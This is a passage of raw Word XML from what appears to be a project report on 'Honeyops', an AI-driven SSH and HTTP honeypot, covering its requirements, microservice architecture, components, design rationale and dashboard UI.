            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Session Playback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Store complete session transcripts with timeline-based replay</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FR-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IOC Visualization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Display IOCs with filtering, enrichment, and CSV/JSON export</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FR-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ATT&amp;CK Analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Generate heatmaps, show technique distribution, support drill-down</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="non-functional-requirements"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.1.2 Non-Functional Requirements</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1267"/>
        <w:gridCol w:w="4118"/>
        <w:gridCol w:w="2534"/>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r>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NFR-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Response Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">500-2000ms for AI responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NFR-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Concurrent Sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20+ simultaneous SSH sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NFR-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dashboard Latency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt;100ms for live updates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NFR-4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Zero Command Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Never execute real commands on host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NFR-5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">System Uptime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">99% availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NFR-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Resource Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt;4GB RAM under typical load</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NFR-7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Data Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ACID-compliant transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NFR-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Container Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">All components in isolated Docker containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="overall-system-architecture"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.2 Overall System Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Honeyops architecture follows a modular microservices design pattern. The system consists of five primary components arranged in a layered architecture:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Frontend Layer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SSH and HTTP frontends that interface directly with attackers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Processing Layer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">AI Engine handling intelligence and response generation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Storage Layer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Sandbox State Store maintaining system persistence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Analytics Layer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">IOC extraction and ATT&amp;CK mapping components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1008"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Presentation Layer:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dashboard system for monitoring and analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Architecture Flow:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[SSH Frontend:2222]  ---&gt;  [AI Engine:8002]  ---&gt;  [Sandbox Store:8001]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       |                        |                          |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">       v                        v                          v</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[HTTP Frontend:8080]     [Dashboard Backend:8003]    [SQLite Database]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                                |</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                                v</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">                        [Dashboard Frontend:3000]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Communication Patterns:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Frontends communicate with AI Engine via REST API (FastAPI)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- AI Engine reads/writes sandbox state through internal API calls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- All components forward telemetry to Dashboard Backend</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Dashboard Frontend consumes data via REST API</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="44" w:name="component-breakdown"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3 Component Breakdown</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="39" w:name="ssh-frontend"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3.1 SSH Frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Function:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Acts as the deceptive SSH server that accepts attacker connections, captures activity, and relays commands to the AI Engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Inputs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Raw SSH connections, credentials, commands, timing data.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Outputs:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">AI-generated terminal output, logged session activity, streamed events.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Technologies:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Python, AsyncSSH, FastAPI.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="http-frontend"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3.2 HTTP Frontend</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Function:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Deception HTTP server accepting any web request and generating believable responses via AI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Technologies:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Python, FastAPI, HTTPX.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="ai-engine"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3.3 AI Engine</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Function:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Generates dynamic fake system behavior, manages state, extracts intelligence, maps to MITRE ATT&amp;CK.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Technologies:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Python, HuggingFace Transformers, spaCy, FastAPI, DeepSeek API.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="sandbox-state-store"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3.4 Sandbox State Store</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Function:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Fully simulated OS environment with fake filesystem, processes, logs, and history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Technologies:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SQLite, Python, FastAPI.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="43" w:name="dashboard-system"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.3.5 Dashboard System</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Function:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SOC-facing monitoring and analysis with real-time updates, session playback, IOC views, and MITRE heatmaps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Technologies:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Backend: FastAPI, Python; Frontend: React, TypeScript, TailwindCSS, Recharts, D3-geo.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="45" w:name="design-decisions-and-rationale"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.4 Design Decisions and Rationale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Modular Microservices:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Enables parallel development, independent testing, and future component replacement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Transformer-Based AI:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Excels at context understanding and coherent text generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">SQLite with JSON Caching:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ACID compliance without server overhead, easy to checkpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Zero Real Command Execution:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Critical security requirement preventing system compromise.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1009"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Docker Containerization:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Ensures isolation, reproducibility, and easy deployment.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="uiux-design"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.5 UI/UX Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The dashboard interface is designed for SOC analysts with a dark theme to reduce eye strain during extended monitoring sessions. Key design principles include:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Information Hierarchy:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Critical alerts and active sessions prominently displayed above summary metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Real-Time Updates:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">WebSocket connections ensure data refreshes without page reloads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Filter-Driven Navigation:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Analysts can filter sessions by risk level, protocol, country, and time range.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Responsive Design:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Optimized for 1920x1080 displays common in SOC environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Export Capabilities:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">One-click export to CSV, JSON, and printable reports.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkEnd w:id="47"/>
    <w:bookmarkStart w:id="55" w:name="chapter-5-implementation-details"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chapter 5: Implementation Details</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="48" w:name="technology-stack"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5.1 Technology Stack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Language</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
